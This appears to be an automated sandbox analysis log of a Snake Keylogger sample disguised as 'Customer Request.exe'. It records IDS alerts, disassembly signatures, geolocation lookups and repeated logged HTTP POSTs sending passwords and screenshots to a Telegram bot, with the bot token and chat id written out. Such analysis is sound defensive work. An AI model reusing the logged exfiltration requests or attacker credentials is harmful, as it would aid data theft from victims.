                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50090 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50092 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50093 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50094 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50095 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50096 version: TLS 1.2
                  Source: Customer Request.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: rqSA.pdbSHA256 source: Customer Request.exe, gCFuOglEso.exe.0.dr
                  Source: Binary string: rqSA.pdb source: Customer Request.exe, gCFuOglEso.exe.0.dr
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 056056F1h10_2_05605440
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05604571h10_2_056042C0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05603157h10_2_05602F78
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05603AE1h10_2_05602F78
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05605CB8h10_2_056058A0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_05602478
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 0560FA11h10_2_0560F768
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 056049D1h10_2_05604720
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_05602C9D
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05605291h10_2_05604FE0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05605CB8h10_2_056058A2
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05605CB8h10_2_05605BE6
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 05604E31h10_2_05604B80
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_05602ABB
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then mov ecx, dword ptr [ebp-4Ch]10_2_06C9D710
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_06C99418
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then mov ecx, dword ptr [ebp-4Ch]10_2_06C9BF6C
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_07242E74
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 0724675Eh10_2_072465A8
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then jmp 0724675Eh10_2_072466AD
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_07245E85
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 4x nop then jmp 06E35356h15_2_06E351A1
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_06E34E35
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 4x nop then jmp 06E35356h15_2_06E352A5
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_06E353A8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49748 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49743 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49743 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49749 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49750 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49751 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49747 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49747 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49752 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49754 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49755 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49757 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49756 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49759 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49753 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49760 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49761 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49762 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49765 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49766 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49767 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49768 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49764 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49758 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49769 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49770 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49771 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49772 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49773 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49774 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49775 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49776 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49778 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49779 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49780 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49781 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49782 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49783 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49784 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49777 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49786 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49798 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49803 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49815 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49816 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49823 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49787 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49846 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49837 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49850 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49858 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49862 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49873 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49874 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49887 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49834 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49895 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49908 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49922 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49894 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49912 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49924 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49935 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49936 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49947 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49949 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49960 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49961 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49886 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49972 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49996 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50002 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50091 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50098 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50096 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50097 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5190d8bacacdHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51c42e28e955Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52005f413c6dHost: api.telegram.orgContent-Length: 708860
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5215a056c53eHost: api.telegram.orgContent-Length: 708860
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5226d6d4bb7aHost: api.telegram.orgContent-Length: 708860
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd523aa40ba3cdHost: api.telegram.orgContent-Length: 708860Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd524bbee8cea5Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd525e1c589f1cHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5236b62b17e5Host: api.telegram.orgContent-Length: 708871
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5271ba01f352Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd524bc8e55afbHost: api.telegram.orgContent-Length: 708871
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5287e31eb585Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52621a53558fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd529f469c46cfHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
